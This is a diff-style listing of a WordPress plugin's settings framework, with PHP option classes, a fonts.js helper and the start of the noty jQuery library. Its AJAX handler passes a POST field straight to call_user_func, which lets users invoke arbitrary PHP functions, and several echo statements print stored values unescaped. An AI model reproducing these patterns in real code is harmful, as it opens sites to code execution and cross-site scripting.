$this->selected[] = explode(';', $v);
|
1166 |
+
}
|
1167 |
+
} else {
|
1168 |
+
$this->selected = null;
|
1169 |
+
}
|
1170 |
+
}
|
1171 |
+
final function getData() {
|
1172 |
+
return $this->data;
|
1173 |
+
}
|
1174 |
+
final function getSelected() {
|
1175 |
+
return $this->selected;
|
1176 |
+
}
|
1177 |
+
}
|
1178 |
+
}
|
1179 |
+
|
1180 |
+
if (!class_exists("wpdreamsImageSettings")) {
|
1181 |
+
class wpdreamsImageSettings extends wpdreamsType {
|
1182 |
+
function getType() {
|
1183 |
+
parent::getType();
|
1184 |
+
$this->processData();
|
1185 |
+
echo "
|
1186 |
+
<div class='wpdreamsImageSettings'>
|
1187 |
+
<fieldset>
|
1188 |
+
<legend>" . $this->label . "</legend>";
|
1189 |
+
new wpdreamsYesNo("show", "Show Images", $this->show);
|
1190 |
+
echo "<br><br>";
|
1191 |
+
new wpdreamsYesNo("cache", "Cache Images", $this->cache);
|
1192 |
+
echo "
|
1193 |
+
<br><br>
|
1194 |
+
<label>Use post featured image</label><select class='smaller' name='featured'>
|
1195 |
+
<option value='-1' ".(($this->featured==-1)?'selected="selected"':'').">Don't use</option>
|
1196 |
+
<option value='0' ".(($this->featured==0)?'selected="selected"':'').">High Priority</option>
|
1197 |
+
<option value='1' ".(($this->featured==1)?'selected="selected"':'').">Medium Priority</option>
|
1198 |
+
<option value='2' ".(($this->featured==2)?'selected="selected"':'').">Low Priority</option>
|
1199 |
+
</select><br><br>
|
1200 |
+
<label>Search for images in post content</label><select class='smaller' name='content'>
|
1201 |
+
<option value='-1' ".(($this->content==-1)?'selected="selected"':'').">Don't use</option>
|
1202 |
+
<option value='0' ".(($this->content==0)?'selected="selected"':'').">High Priority</option>
|
1203 |
+
<option value='1' ".(($this->content==1)?'selected="selected"':'').">Medium Priority</option>
|
1204 |
+
<option value='2' ".(($this->content==2)?'selected="selected"':'').">Low Priority</option>
|
1205 |
+
</select><br><br>
|
1206 |
+
<label>Search for images in post excerpt</label><select class='smaller' name='excerpt'>
|
1207 |
+
<option value='-1' ".(($this->excerpt==-1)?'selected="selected"':'').">Don't use</option>
|
1208 |
+
<option value='0' ".(($this->excerpt==0)?'selected="selected"':'').">High Priority</option>
|
1209 |
+
<option value='1' ".(($this->excerpt==1)?'selected="selected"':'').">Medium Priority</option>
|
1210 |
+
<option value='2' ".(($this->excerpt==2)?'selected="selected"':'').">Low Priority</option>
|
1211 |
+
</select><br><br>
|
1212 |
+
<label>Use the </label><select class='smaller' name='imagenum'>
|
1213 |
+
<option value='1' ".(($this->imagenum==1)?'selected="selected"':'').">1. found image</option>
|
1214 |
+
<option value='2' ".(($this->imagenum==2)?'selected="selected"':'').">2. found image</option>
|
1215 |
+
<option value='3' ".(($this->imagenum==3)?'selected="selected"':'').">3. found image</option>
|
1216 |
+
</select><br><br>
|
1217 |
+
<label>Image Size:</label>
|
1218 |
+
<span style='color:#888;font-size:0.9em'>Width </span><input class='threedigit' param=0 type='text' value='".$this->width."' name='width' /><span style='color:#888;font-size:0.9em;margin-right:10px;'> px</span>
|
1219 |
+
<span style='color:#888;font-size:0.9em'>Height </span><input class='threedigit' param=0 type='text' value='".$this->height."' name='height' /><span style='color:#888;font-size:0.9em;margin-right:10px;'> px</span>
|
1220 |
+
";
|
1221 |
+
echo "
|
1222 |
+
<input type='hidden' param=1 value='" . $this->data . "' name='" . $this->name . "'>
|
1223 |
+
<div class='triggerer'></div>
|
1224 |
+
</fieldset>
|
1225 |
+
</div>";
|
1226 |
+
}
|
1227 |
+
function processData() {
|
1228 |
+
$this->data = str_replace("\n", "", $this->data);
|
1229 |
+
preg_match("/show:(.*?);/", $this->data, $matches);
|
1230 |
+
$this->show = $matches[1];
|
1231 |
+
preg_match("/cache:(.*?);/", $this->data, $matches);
|
1232 |
+
$this->cache = $matches[1];
|
1233 |
+
preg_match("/featured:(.*?);/", $this->data, $matches);
|
1234 |
+
$this->featured = $matches[1];
|
1235 |
+
preg_match("/content:(.*?);/", $this->data, $matches);
|
1236 |
+
$this->content = $matches[1];
|
1237 |
+
preg_match("/excerpt:(.*?);/", $this->data, $matches);
|
1238 |
+
$this->excerpt= $matches[1];
|
1239 |
+
preg_match("/imagenum:(.*?);/", $this->data, $matches);
|
1240 |
+
$this->imagenum = $matches[1];
|
1241 |
+
preg_match("/width:(.*?);/", $this->data, $matches);
|
1242 |
+
$this->width = $matches[1];
|
1243 |
+
preg_match("/height:(.*?);/", $this->data, $matches);
|
1244 |
+
$this->height = $matches[1];
|
1245 |
+
$this->ret = array();
|
1246 |
+
$this->ret['show'] = $this->show;
|
1247 |
+
$this->ret['cache'] = $this->cache;
|
1248 |
+
$this->ret['width'] = $this->width;
|
1249 |
+
$this->ret['height'] = $this->height;
|
1250 |
+
$this->ret['imagenum'] = $this->imagenum;
|
1251 |
+
$this->ret['from'] = array(
|
1252 |
+
$this->featured=>"featured",
|
1253 |
+
$this->content=>"content",
|
1254 |
+
$this->excerpt=>"excerpt"
|
1255 |
+
);
|
1256 |
+
}
|
1257 |
+
final function getData() {
|
1258 |
+
return $this->data;
|
1259 |
+
}
|
1260 |
+
final function getSettings() {
|
1261 |
+
return $this->ret;
|
1262 |
+
}
|
1263 |
+
}
|
1264 |
+
}
|
1265 |
+
|
1266 |
+
if (!class_exists("wpdreamsThemeChooser")) {
|
1267 |
+
class wpdreamsThemeChooser extends wpdreamsType {
|
1268 |
+
function getType() {
|
1269 |
+
parent::getType();
|
1270 |
+
echo "
|
1271 |
+
<div class='wpdreamsThemeChooser'>
|
1272 |
+
<fieldset style='background:#eee'>
|
1273 |
+
<label style='color:#333' for='wpdreamsThemeChooser_'" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
1274 |
+
$decodedData = json_decode($this->data);
|
1275 |
+
echo "<select id='wpdreamsThemeChooser_" . self::$_instancenumber . "'>
|
1276 |
+
<option value=''>Select</option>";
|
1277 |
+
foreach ($decodedData as $name=>$theme) {
|
1278 |
+
echo "<option value='".$name."'>".$name."</option>";
|
1279 |
+
}
|
1280 |
+
echo "</select>";
|
1281 |
+
foreach ($decodedData as $name=>$theme) {
|
1282 |
+
echo "<div name='".$name."' style='display:none;'>";
|
1283 |
+
foreach ($theme as $pname=>$param) {
|
1284 |
+
echo "<p paramname='".$pname."'>".$param."</p>";
|
1285 |
+
}
|
1286 |
+
echo "</div>";
|
1287 |
+
}
|
1288 |
+
echo "
|
1289 |
+
<span></span></fieldset>
|
1290 |
+
</div>";
|
1291 |
+
}
|
1292 |
+
}
|
1293 |
+
}
|
1294 |
+
if (!class_exists("wpdreamsColorPicker")) {
|
1295 |
+
class wpdreamsColorPicker extends wpdreamsType {
|
1296 |
+
function getType() {
|
1297 |
+
$this->name = $this->name . "_colorpicker";
|
1298 |
+
parent::getType();
|
1299 |
+
echo "<div class='wpdreamsColorPicker'>";
|
1300 |
+
if ($this->label != "")
|
1301 |
+
echo "<label for='wpdreamscolorpicker_" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
1302 |
+
echo "<input type='text' class='color' name='" . $this->name . "' id='wpdreamscolorpicker_" . self::$_instancenumber . "' value='" . $this->data . "' />";
|
1303 |
+
echo "<input type='button' class='wpdreamscolorpicker button-secondary' value='Select Color'>";
|
1304 |
+
echo "<div class='' style='z-index: 100; background:#eee; border:1px solid #ccc; position:absolute; display:none;'></div>";
|
1305 |
+
echo "<div class='triggerer'></div>
|
1306 |
+
</div>";
|
1307 |
+
}
|
1308 |
+
}
|
1309 |
+
}
|
1310 |
+
|
1311 |
+
if (!class_exists("wpdreamsColorPickerDummy")) {
|
1312 |
+
class wpdreamsColorPickerDummy extends wpdreamsType {
|
1313 |
+
function getType() {
|
1314 |
+
$this->name = $this->name . "_colorpicker";
|
1315 |
+
echo "<div class='wpdreamsColorPicker'>";
|
1316 |
+
if ($this->label != "")
|
1317 |
+
echo "<label for='wpdreamscolorpicker_" . self::$_instancenumber . "'>" . $this->label . "</label>";
|
1318 |
+
echo "<input type='text' class='color' name='" . $this->name . "' id='wpdreamscolorpicker_" . self::$_instancenumber . "' value='" . $this->data . "' />";
|
1319 |
+
echo "<input type='button' class='wpdreamscolorpicker button-secondary' value='Select Color'>";
|
1320 |
+
echo "<div class='' style='z-index: 100; background:#eee; border:1px solid #ccc; position:absolute; display:none;'></div>";
|
1321 |
+
echo "<div class='triggerer'></div>
|
1322 |
+
</div>";
|
1323 |
+
}
|
1324 |
+
}
|
1325 |
+
}
|
1326 |
+
|
1327 |
+
add_action('admin_print_styles', 'admin_stylesV02t');
|
1328 |
+
add_action('admin_enqueue_scripts', 'admin_scriptsV02t');
|
1329 |
+
add_action('wp_ajax_wpdreams-ajaxinput', "ajaxinputcallback");
|
1330 |
+
if (!function_exists("ajaxinputcallback")) {
|
1331 |
+
function ajaxinputcallback() {
|
1332 |
+
$param = $_POST;
|
1333 |
+
echo call_user_func($_POST['callback'], $param);
|
1334 |
+
exit;
|
1335 |
+
}
|
1336 |
+
}
|
1337 |
+
function admin_scriptsV02t() {
|
1338 |
+
wp_enqueue_script('jquery');
|
1339 |
+
wp_enqueue_script('media-upload');
|
1340 |
+
wp_enqueue_script('thickbox');
|
1341 |
+
wp_enqueue_script('farbtastic', array(
|
1342 |
+
'wpdreams-jquerytooltip'
|
1343 |
+
));
|
1344 |
+
wp_register_script('wpdreams-others', plugin_dir_url(__FILE__) . '/types/others.js', array(
|
1345 |
+
'jquery',
|
1346 |
+
'thickbox',
|
1347 |
+
'farbtastic',
|
1348 |
+
'wpdreams-notytheme'
|
1349 |
+
));
|
1350 |
+
wp_enqueue_script('wpdreams-others');
|
1351 |
+
wp_enqueue_script('jquery-ui-tabs');
|
1352 |
+
wp_enqueue_script('jquery-ui-sortable');
|
1353 |
+
wp_enqueue_script('jquery-ui-draggable');
|
1354 |
+
wp_register_script('wpdreams-upload', plugin_dir_url(__FILE__) . '/types/upload.js', array(
|
1355 |
+
'jquery',
|
1356 |
+
'media-upload',
|
1357 |
+
'thickbox'
|
1358 |
+
));
|
1359 |
+
wp_enqueue_script('wpdreams-upload');
|
1360 |
+
wp_register_script('wpdreams-noty', plugin_dir_url(__FILE__) . '/types/js/noty/jquery.noty.js', array(
|
1361 |
+
'jquery'
|
1362 |
+
));
|
1363 |
+
wp_enqueue_script('wpdreams-noty');
|
1364 |
+
wp_register_script('wpdreams-notylayout', plugin_dir_url(__FILE__) . '/types/js/noty/layouts/top.js', array(
|
1365 |
+
'wpdreams-noty'
|
1366 |
+
));
|
1367 |
+
wp_enqueue_script('wpdreams-notylayout');
|
1368 |
+
wp_register_script('wpdreams-notytheme', plugin_dir_url(__FILE__) . '/types/js/noty/themes/default.js', array(
|
1369 |
+
'wpdreams-noty'
|
1370 |
+
));
|
1371 |
+
wp_enqueue_script('wpdreams-notytheme');
|
1372 |
+
wp_register_script('wpdreams-jquerytooltip', 'http://cdn.jquerytools.org/1.2.7/all/jquery.tools.min.js', array(
|
1373 |
+
'jquery'
|
1374 |
+
));
|
1375 |
+
wp_enqueue_script('wpdreams-jquerytooltip');
|
1376 |
+
}
|
1377 |
+
function admin_stylesV02t() {
|
1378 |
+
wp_enqueue_style('thickbox');
|
1379 |
+
wp_enqueue_style('farbtastic');
|
1380 |
+
wp_register_style('wpdreams-jqueryui', 'http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css');
|
1381 |
+
wp_enqueue_style('wpdreams-jqueryui');
|
1382 |
+
wp_register_style('wpdreams-style', plugin_dir_url(__FILE__) . '/types/style.css');
|
1383 |
+
wp_enqueue_style('wpdreams-style');
|
1384 |
+
}
|
1385 |
+
/* Extra Functions */
|
1386 |
+
if (!function_exists("isEmpty")) {
|
1387 |
+
function isEmpty($v) {
|
1388 |
+
if (trim($v) != "")
|
1389 |
+
return false;
|
1390 |
+
else
|
1391 |
+
return true;
|
1392 |
+
}
|
1393 |
+
}
|
1394 |
+
|
1395 |
+
if (!function_exists("in_array_r")) {
|
1396 |
+
function in_array_r($needle, $haystack, $strict = true) {
|
1397 |
+
foreach ($haystack as $item) {
|
1398 |
+
if (($strict ? $item === $needle : $item == $needle) || (is_array($item) && in_array_r($needle, $item, $strict))) {
|
1399 |
+
return true;
|
1400 |
+
}
|
1401 |
+
}
|
1402 |
+
|
1403 |
+
return false;
|
1404 |
+
}
|
1405 |
+
}
|
1406 |
+
?>
|
settings/types/fonts.js
ADDED
@@ -0,0 +1,167 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
function loadFonts(family) {
|
2 |
+
var fonts = new Array(
|
3 |
+
'Allan:400,700',
|
4 |
+
'Allerta:400,700',
|
5 |
+
'Allerta+Stencil:400,700',
|
6 |
+
'Anonymous+Pro:400,700',
|
7 |
+
'Arimo:400,700',
|
8 |
+
'Arvo:400,700',
|
9 |
+
'Bentham:400,700',
|
10 |
+
'Buda:400,700',
|
11 |
+
'Cabin:400,700',
|
12 |
+
'Calligraffitti:400,700',
|
13 |
+
'Cantarell:400,700',
|
14 |
+
'Cardo:400,700',
|
15 |
+
'Cherry+Cream+Soda:400,700',
|
16 |
+
'Chewy:400,700',
|
17 |
+
'Coda:400,700',
|
18 |
+
'Coming+Soon:400,700',
|
19 |
+
'Copse:400,700',
|
20 |
+
'Corben:400,700',
|
21 |
+
'Cousine:400,700',
|
22 |
+
'Covered+By+Your+Grace:400,700',
|
23 |
+
'Crafty+Girls:400,700',
|
24 |
+
'Crimson+Text:400,700',
|
25 |
+
'Crushed:400,700',
|
26 |
+
'Cuprum:400,700',
|
27 |
+
'Droid+Sans:400,700',
|
28 |
+
'Droid+Sans+Mono:400,700',
|
29 |
+
'Droid+Serif:400,700',
|
30 |
+
'Fontdiner+Swanky:400,700',
|
31 |
+
'GFS+Didot:400,700',
|
32 |
+
'GFS+Neohellenic:400,700',
|
33 |
+
'Geo:400,700',
|
34 |
+
'Gruppo:400,700',
|
35 |
+
'Hanuman:400,700',
|
36 |
+
'Homemade+Apple:400,700',
|
37 |
+
'IM+Fell+DW+Pica:400,700',
|
38 |
+
'IM+Fell+DW+Pica+SC:400,700',
|
39 |
+
'IM+Fell+Double+Pica:400,700',
|
40 |
+
'IM+Fell+Double+Pica+SC:400,700',
|
41 |
+
'IM+Fell+English:400,700',
|
42 |
+
'IM+Fell+English+SC:400,700',
|
43 |
+
'IM+Fell+French+Canon:400,700',
|
44 |
+
'IM+Fell+French+Canon+SC:400,700',
|
45 |
+
'IM+Fell+Great+Primer:400,700',
|
46 |
+
'IM+Fell+Great+Primer+SC:400,700',
|
47 |
+
'Inconsolata:400,700',
|
48 |
+
'Irish+Growler:400,700',
|
49 |
+
'Josefin+Sans:400,700',
|
50 |
+
'Josefin+Slab:400,700',
|
51 |
+
'Just+Another+Hand:400,700',
|
52 |
+
'Just+Me+Again+Down+Here:400,700',
|
53 |
+
'Kenia:400,700',
|
54 |
+
'Kranky:400,700',
|
55 |
+
'Kristi:400,700',
|
56 |
+
'Lato:400,700',
|
57 |
+
'Lekton:400,700',
|
58 |
+
'Lobster:400,700',
|
59 |
+
'Luckiest+Guy:400,700',
|
60 |
+
'Merriweather:400,700',
|
61 |
+
'Molengo:400,700',
|
62 |
+
'Mountains+of+Christmas:400,700',
|
63 |
+
'Neucha:400,700',
|
64 |
+
'Neuton:400,700',
|
65 |
+
'Nobile:400,700',
|
66 |
+
'OFL+Sorts+Mill+Goudy+TT:400,700',
|
67 |
+
'Old+Standard+TT:400,700',
|
68 |
+
'Orbitron:400,700',
|
69 |
+
'PT+Sans:400,700',
|
70 |
+
'PT+Sans+Caption:400,700',
|
71 |
+
'PT+Sans+Narrow:400,700',
|
72 |
+
'Permanent+Marker:400,700',
|
73 |
+
'Philosopher:400,700',
|
74 |
+
'Puritan:400,700',
|
75 |
+
'Raleway:400,700',
|
76 |
+
'Reenie+Beanie:400,700',
|
77 |
+
'Rock+Salt:400,700',
|
78 |
+
'Schoolbell:400,700',
|
79 |
+
'Slackey:400,700',
|
80 |
+
'Sniglet:400,700',
|
81 |
+
'Sunshiney:400,700',
|
82 |
+
'Syncopate:400,700',
|
83 |
+
'Tangerine:400,700',
|
84 |
+
'Tinos:400,700',
|
85 |
+
'Ubuntu:400,700',
|
86 |
+
'UnifrakturCook:400,700',
|
87 |
+
'UnifrakturMaguntia:400,700',
|
88 |
+
'Unkempt:400,700',
|
89 |
+
'Vibur:400,700',
|
90 |
+
'Vollkorn:400,700',
|
91 |
+
'Walter+Turncoat:400,700',
|
92 |
+
'Yanone+Kaffeesatz:400,700'
|
93 |
+
);
|
94 |
+
WebFontConfig = {
|
95 |
+
google: { families: [family+":400,700"] }
|
96 |
+
};
|
97 |
+
(function() {
|
98 |
+
var wf = document.createElement('script');
|
99 |
+
wf.src = ('https:' == document.location.protocol ? 'https' : 'http') +
|
100 |
+
'://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js';
|
101 |
+
wf.type = 'text/javascript';
|
102 |
+
wf.async = 'true';
|
103 |
+
var s = document.getElementsByTagName('script')[0];
|
104 |
+
s.parentNode.insertBefore(wf, s);
|
105 |
+
})();
|
106 |
+
}
|
107 |
+
(function($) {
|
108 |
+
jQuery(document).ready(function() {
|
109 |
+
});
|
110 |
+
jQuery(".wpdreamsfont").change(function() {
|
111 |
+
var weightNode = jQuery('input[name=*font-weight]:checked', this.parentNode)[0];
|
112 |
+
jQuery(weightNode).trigger('change');
|
113 |
+
return;
|
114 |
+
});
|
115 |
+
jQuery(".color").change(function() {
|
116 |
+
var weightNode = jQuery('input[name=*font-weight]:checked', this.parentNode)[0];
|
117 |
+
jQuery(weightNode).trigger('change');
|
118 |
+
return;
|
119 |
+
});
|
120 |
+
jQuery(".wpdreams-fontsize").change(function() {
|
121 |
+
var weightNode = jQuery('input[name=*font-weight]:checked', this.parentNode)[0];
|
122 |
+
jQuery(weightNode).trigger('change');
|
123 |
+
return;
|
124 |
+
});
|
125 |
+
jQuery(".wpdreamsfont").keypress(function() {
|
126 |
+
jQuery(this).change();
|
127 |
+
});
|
128 |
+
jQuery(".wpdreams-lineheight").change(function() {
|
129 |
+
var weightNode = jQuery('input[name=*font-weight]:checked', this.parentNode)[0];
|
130 |
+
jQuery(weightNode).trigger('change');
|
131 |
+
});
|
132 |
+
jQuery('.wpdreans-fontweight').change(function() {
|
133 |
+
var weight = "font-weight:"+jQuery(this).val()+";";
|
134 |
+
var familyNode = jQuery('.wpdreamsfont', this.parentNode)[0];
|
135 |
+
var colorNode = jQuery('.color', this.parentNode)[0];
|
136 |
+
var sizeNode = jQuery('.wpdreams-fontsize', this.parentNode)[0];
|
137 |
+
var lhNode = jQuery('.wpdreams-lineheight', this.parentNode)[0];
|
138 |
+
|
139 |
+
var family = "font-family:"+jQuery(familyNode).val()+";";
|
140 |
+
var color = "color:"+jQuery(colorNode).val()+";";
|
141 |
+
var size = "font-size:"+jQuery(sizeNode).val()+";";
|
142 |
+
var lh = "line-height:"+jQuery(lhNode).val()+";";
|
143 |
+
|
144 |
+
loadFonts(jQuery(familyNode).val());
|
145 |
+
jQuery("label", this.parentNode).css("font-family", jQuery(familyNode).val());
|
146 |
+
jQuery("label", this.parentNode).css("font-weight", jQuery(this).val());
|
147 |
+
jQuery("label", this.parentNode).css("color", jQuery(colorNode).val());
|
148 |
+
jQuery("input[type=hidden]", this.parentNode).val("font-weight:"+jQuery(this).val()+";"+family+color+size+lh);
|
149 |
+
});
|
150 |
+
|
151 |
+
|
152 |
+
$(".wpdreamsFont>fieldset>.triggerer").click(function() {
|
153 |
+
var parent = $(this).parent();
|
154 |
+
|
155 |
+
var hidden = $('input[type=hidden]', parent);
|
156 |
+
var val = hidden.val().replace(/(\r\n|\n|\r)/gm,"");
|
157 |
+
var familyNode = jQuery('.wpdreamsfont', parent)[0];
|
158 |
+
var colorNode = jQuery('.color', parent)[0];
|
159 |
+
var sizeNode = jQuery('.wpdreams-fontsize', parent)[0];
|
160 |
+
var lhNode = jQuery('.wpdreams-lineheight', this.parentNode)[0];
|
161 |
+
|
162 |
+
$(familyNode).val(val.match(/family:(.*?);/)[1]);
|
163 |
+
$(sizeNode).val(val.match(/size:(.*?);/)[1]);
|
164 |
+
$(colorNode).val(val.match(/color:(.*?);/)[1]);
|
165 |
+
$(lhNode).val(val.match(/height:(.*?);/)[1]);
|
166 |
+
});
|
167 |
+
}(jQuery));
|
settings/types/icons/arrow-left.png
ADDED
Binary file
|
settings/types/icons/arrow-right.png
ADDED
Binary file
|
settings/types/icons/black_arrow.png
ADDED
Binary file
|
settings/types/icons/close.png
ADDED
Binary file
|
settings/types/icons/delete.png
ADDED
Binary file
|
settings/types/icons/down.png
ADDED
Binary file
|
settings/types/icons/drag.png
ADDED
Binary file
|
settings/types/icons/float.png
ADDED
Binary file
|
settings/types/icons/info.png
ADDED
Binary file
|
settings/types/icons/labelposition.png
ADDED
Binary file
|
settings/types/icons/loading-big.gif
ADDED
Binary file
|
settings/types/icons/paint.png
ADDED
Binary file
|
settings/types/icons/point.png
ADDED
Binary file
|
settings/types/icons/settings.png
ADDED
Binary file
|
settings/types/icons/slides.png
ADDED
Binary file
|
settings/types/icons/up.png
ADDED
Binary file
|
settings/types/js/noty/jquery.noty.js
ADDED
@@ -0,0 +1,517 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
/**
|
2 |
+
* noty - jQuery Notification Plugin v2.0.3
|
3 |
+
* Contributors: https://github.com/needim/noty/graphs/contributors
|
4 |
+
*
|
5 |
+
* Examples and Documentation - http://needim.github.com/noty/
|
6 |
+
*
|
7 |
+
* Licensed under the MIT licenses:
|
8 |
+
* http://www.opensource.org/licenses/mit-license.php
|
9 |
+
*
|
10 |
+
**/
|
11 |
+
|
12 |
+
if (typeof Object.create !== 'function') {
|
13 |
+
Object.create = function (o) {
|
14 |
+
function F() {
|
15 |
+
}
|
16 |
+
|
17 |
+
F.prototype = o;
|
18 |
+
return new F();
|
19 |
+
};
|
20 |
+
}
|
21 |
+
|
22 |
+
(function ($) {
|
23 |
+
|
24 |
+
var NotyObject = {
|
25 |
+
|
26 |
+
init:function (options) {
|
27 |
+
|
28 |
+
// Mix in the passed in options with the default options
|
29 |
+
this.options = $.extend({}, $.noty.defaults, options);
|
30 |
+
|
31 |
+
this.options.layout = (this.options.custom) ? $.noty.layouts['inline'] : $.noty.layouts[this.options.layout];
|
32 |
+
this.options.theme = $.noty.themes[this.options.theme];
|
33 |
+
|
34 |
+
delete options.layout;
|
35 |
+
delete options.theme;
|
36 |
+
|
37 |
+
this.options = $.extend({}, this.options, this.options.layout.options);
|
38 |
+
this.options.id = 'noty_' + (new Date().getTime() * Math.floor(Math.random() * 1000000));
|
39 |
+
|
40 |
+
this.options = $.extend({}, this.options, options);
|
41 |
+
|
42 |
+
// Build the noty dom initial structure
|
43 |
+
this._build();
|
44 |
+
|
45 |
+
// return this so we can chain/use the bridge with less code.
|
46 |
+
return this;
|
47 |
+
}, // end init
|
48 |
+
|
49 |
+
_build:function () {
|
50 |
+
|
51 |
+
// Generating noty bar
|
52 |
+
var $bar = $('<div class="noty_bar"></div>').attr('id', this.options.id);
|
53 |
+
$bar.append(this.options.template).find('.noty_text').html(this.options.text);
|
54 |
+
|
55 |
+
this.$bar = (this.options.layout.parent.object !== null) ? $(this.options.layout.parent.object).css(this.options.layout.parent.css).append($bar) : $bar;
|
56 |
+
|
57 |
+
// Set buttons if available
|
58 |
+
if (this.options.buttons) {
|
59 |
+
|
60 |
+
// If we have button disable closeWith & timeout options
|
61 |
+
this.options.closeWith = [];
|
62 |
+
this.options.timeout = false;
|
63 |
+
|
64 |
+
var $buttons = $('<div/>').addClass('noty_buttons');
|
65 |
+
|
66 |
+
(this.options.layout.parent.object !== null) ? this.$bar.find('.noty_bar').append($buttons) : this.$bar.append($buttons);
|
67 |
+
|
68 |
+
var self = this;
|
69 |
+
|
70 |
+
$.each(this.options.buttons, function (i, button) {
|
71 |
+
var $button = $('<button/>').addClass((button.addClass) ? button.addClass : 'gray').html(button.text)
|
72 |
+
.appendTo(self.$bar.find('.noty_buttons'))
|
73 |
+
.bind('click', function () {
|
74 |
+
if ($.isFunction(button.onClick)) {
|
75 |
+
button.onClick.call($button, self);
|
76 |
+
}
|
77 |
+
});
|
78 |
+
});
|
79 |
+
}
|
80 |
+
|
81 |
+
// For easy access
|
82 |
+
this.$message = this.$bar.find('.noty_message');
|
83 |
+
